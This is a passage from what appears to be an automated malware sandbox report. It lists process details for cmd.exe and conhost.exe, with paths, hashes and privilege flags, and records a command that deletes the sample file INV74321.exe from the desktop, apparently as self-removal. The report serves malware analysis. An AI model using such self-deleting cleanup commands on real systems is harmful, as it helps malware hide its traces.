                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x1f0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: conhost.exe PID: 6488 Parent PID: 6480

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >